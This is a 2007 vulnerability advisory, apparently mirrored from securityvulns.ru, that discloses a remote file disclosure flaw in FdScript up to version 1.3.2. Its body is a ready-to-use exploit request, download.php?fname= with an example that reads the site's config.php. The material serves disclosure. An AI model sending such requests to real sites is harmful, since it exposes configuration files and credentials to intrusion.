Security Advisory: FdScript <= v1.3.2 Remote File Disclosure Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Open Conference Systems = 2.8.2 Remote File Inclusion
  AdMentor (banners) admin SQL injection
  local Calendar System v1.1 (lcStdLib.
inc) Remote File Include
  Full Disclosure: Arbitrary Code Execution in LedgerSMB CVE-2006-5872

From: ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date: 28.01.2007
Subject: FdScript <= v1.3.2 Remote File Disclosure Vulnerability

*******************************************************************************
# Title   : FdScript <= v1.3.2 Remote File Disclosure Vulnerability
# Author : ajann
# Contact : :(
# Site    : http://stud.usv.ro/~vlad_l/
# $$      : Free

*******************************************************************************

[[SOURCE]]]---------------------------------------------------------

http://[target]/[path]//download.php?fname=[SOURCE FILE]

Example:

//download.php?fname=./indexfiles/config.php
[[/SOURCE]]

""""""""""""""
"""""""
# ajann,Turkey
# ...

# Im not Hacker!